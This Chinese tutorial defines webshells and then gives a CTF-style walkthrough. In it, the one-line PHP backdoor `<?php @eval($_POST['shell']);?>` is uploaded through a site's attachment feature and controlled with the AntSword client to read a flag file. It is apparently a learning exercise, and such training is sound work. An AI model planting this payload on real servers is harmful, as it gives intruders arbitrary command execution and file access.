什么是webshell

webshell是web入侵的脚本攻击工具。
简单的说来，webshell就是一个asp或php木马后门，黑客在入侵了一个网站后，常常在将这些asp或php木马后门文件放置在网站服务器的web目录中，与正常的网页文件混在一起。然后黑客就可以用web的方式，通过asp或php木马后门控制网站服务器，包括上传下载文件、查看数据库、执行任意程序命令等。

webshell的分类

①根据文件大小分类：大马和小马(通常指的是一句话木马，能够使用菜刀这类工具去直接连接它)
②根据脚本名称分类：jsp、asp、aspx、php

实战演示（一句话木马，然后用蚁剑链接）

• 寻找上传点
  点击各个选项，看看哪里有文件上传的地方（我这里以附件管理为例，也可以再上传图片的地方）
  
  编辑一个PHP文件，里面写入一句话木马 <?php @eval($_POST['shell']);?>
  
• 上传webshell
  点击进入上传附件
  写个附件标题，方便查找文件位置，点击浏览，选择webshell.php,然后提交
  
• 查找文件位置
  去网站前台，找到 拉拉啦 附件
  滑到页面最下端，点击 常用文件
  右键 拉拉啦下载处，新标签打开
  

复制url地址

• 蚁剑链接
  打开蚁剑，右键空白处添加数据
  粘贴URL地址
  密码填 shell ,密码在你传入的一句话木马里

点击添加

双击链接网站后台服务器，

• 寻找flag
  查看每个文件夹，在根目录下找到 /home/flag
  点击flag文件
  

完结

撒花！！！